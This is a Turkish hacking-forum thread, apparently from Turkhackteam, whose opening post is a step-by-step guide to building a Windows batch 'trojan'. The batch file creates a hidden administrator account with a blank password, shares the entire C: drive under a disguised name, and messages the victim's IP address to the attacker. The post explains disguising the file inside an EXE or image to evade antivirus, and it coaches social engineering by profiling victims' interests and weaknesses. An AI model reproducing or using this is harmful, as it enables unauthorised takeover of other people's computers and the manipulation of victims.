Trojan Nasıö Yapılır\Yutturlulur

AdigeS

Üye
25 Ağu 2017
60
0
Sa Ben Sefa.

Size simdi anlatacagim yöntem, biraz mantik biraz da teknik bilgi gerektirmektedir. Bu ikisinin disinda baska hicbir toola ihtiyaciniz yoktur.

Simdi Trojanimizi hazirlamaya baslayalim;

1-) Öncelikle bir TXT dosyasi acin ve icine su komutu girin;

net user HACK /add

Bu komut sayesinde kurbanin makinasinda "HACK" isminde bir user yarattik. Fakat bu user hesabi normal olarak acildigi icin haklari da sınırlı olacaktir. Bu nedenle ikinci asamaya geciyoruz;

2-) Simdi yukaridaki komutun hemen bir alt satirina gecin ve su komutu ekleyin;

net localgroup administrators HACK /add

Böylece "HACK" isimli kullanici hesabini, direk Administrator grubuna kattik. Artik "HACK" hesabimiz tüm yetkilere sahip.

3-) Simdi de kurbanimizin makinasindaki C: sürücüsünü sınırsız paylasima acacagiz. Kurbani da huylandirmamak icin paylasim adini SYSTEM olarak set edecegiz. Bunun icin asagidaki komutu kullanacagiz;

net share system=C: /unlimited

Ewet artik Kurbanimizin makinasini sonuna kadar actik. Peki kurbanin IP sini nereden bilecegiz de kurbanin makinasina bu yarattigimiz "HACK" hesabindan baglanacagiz?

Bunun icin de kodumuza bir satirlik bir komut daha ekleyecegiz;

4-) NET SEND komutunu kullanarak kurbanin bize Windowsun Messaging Servisi vasitasi ile mesaj atmasini ve IP sini bize söylemesini saglayacagiz. Bunun icin asagidaki komutu da kodunuzun icerisine ekleyin;

net send 82.35.23.46(buraya kendi IP nizi girin) Ben senin kurbaninim Gel bana baglan

Unutmayin 82. li baslayan IP adresi yerine kendi IP nizi yazin.

4-) Son olarak ufak bir önlem alacagiz. Peki nedir bu önlem? Bildiginiz gibi Windows Messenger Servisini kullanan internette ortalikta gezinen bircok ufak tefek Spylar oldugu icin Messenger servisi genelde Disabled 'dir. Disabled olursa NET SEND komutu bir ise yaramaz. DOS komut satirinda yardimci ekler olmadikca da herhangi bir Disabled servisi Enable bildigim kadari ile edemeyiz. Fakat eger Disabled degil de Manuel ise o zaman Messenger servisini calistirabiliriz. Bu son önlemimizde de Manuel olan ve calismayan Messenger servisini calistiracagiz.

Öncelikle Administrative Tools dan Services sekmesine giriyoruz ve oradan Messenger servisinin kod icerisinde kullanacagimiz adini ögreniyoruz. Adi Messenger 'mis. simdi bu adi kullanarak bu servisi calistiriyoruz.

net start Messenger

Size tavsiyem, bu son komutu kodunuzun en basina koymaniz. Böylelikle ardisik sirada önce Messenger servisi calistirilacak daha sonra diger islemler yapilacaktir. Kodun saglikli calismasi acisindan bu 4. şıkkı ilk siraya koymaniz daha iyi olur.

Son olarak TXT de yazdiginiz kodunuzu .bat olarak istediginiz bir isimde kaydedin ve ister bir EXE ile join ettirin ister bir resim ile birlestirin isterseniz kurbaniniza direk gönderin.

Kurbaniniz bu dosyayi calistirdigi an makinasinda Admin haklarina sahip HACK adinda bir user acilacak ve sifresi de blank yani bos olacaktir. C: sürücüsü de full olarak paylasima acilmis olacak ve son olarak da IP si size gelecektir.

Artik IP sini de bildiginize göre, ister DOS komut satirina düserek direk HACK kullanicisina baglanabilir istediginizi yapabilirsiniz ister Essential Net Tools türünden bir program ile paylasima actirdiginiz C: sürücüsüne sizar istediginizi yaparsiniz.

Isin en güzel tarafi, yukaridaki BAT dosyasinin tamamen Microsoftun bize sundugu DOS komutlari kullanilarak hazirlanmis olmasi nedeni ile hicbir Anti Viruse yakalanmamasi ve "HACK" kullanicisina direk Admin olarak baglandiginiz icin hicbir personal firewall tarafindan engellenmemesidir.

Şimdi akıllarda kalan eee abi o trojanı ne yapıcaz sorusuna gelelim Smile

arkadaşlar eskisi gibi skypede, veya farklı sosyal medya platformlarında "kanka bu muzik, kanka bu resim, kanka bu program çok iyi, güzel, sağlam indirsene" diyerek olmuyor bu işler, yedirebilmek için öncelikle en önemlisi SOSYAL MÜHENDİSLİKgereklidir. onada birazdan deyinicem arkadaşlar sabırlı olun okumaya devam ediniz. ve ekstra bilgiler gereklidir. kişinin öncelikle ne tür şeylerden hoşlandığını öğrenmek lazım, bilgi toplamanız lazım, sabırlı olmak en önemli faktörlerden birisidir, bu iş 1 ayınızı 2 ayınızı veya 1 gününüzü alabilir, ikna yönteminize ve hayal gücünüze bağlı, kişiye nasıl evet detirtmenize bağlı, basit yöntemlerden kaçının. Öncelikle ben yermiyim diye sorun kendinize, siz bu işten anlıyorsunuz kişi anlamıyor, siz bile yiyecek kıvamdaysanız karşıdaki kişi nasıl yemesin? ÖRNEK TOPLANACAK BİLGİLER : yaşı, sevdiği oyunlar, sevdiği muzikler, sevdiği karakterler, bilgisayara verdiği önem, işletim sistemi(işletim sistemi ne alaka diceksiniz, adamda xp varsa ve siz ona kanka windows 10 istiyormusun ve bu adamın windows 10 a geçicek maddi durumu yoksa balık gibi atliyacaktır) kadınlara olan zaafı, ve ortak noktalarınız ardından zayıf noktaları. bu bilgileri toplayin ve sonrası hayal gücünüze kalmış.
 

MxRohst

Katılımcı Üye
1 Eki 2017
453
0
Eline sağlık kardeşim
Başarılarınızin devamını dilerim iyi başarılar
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.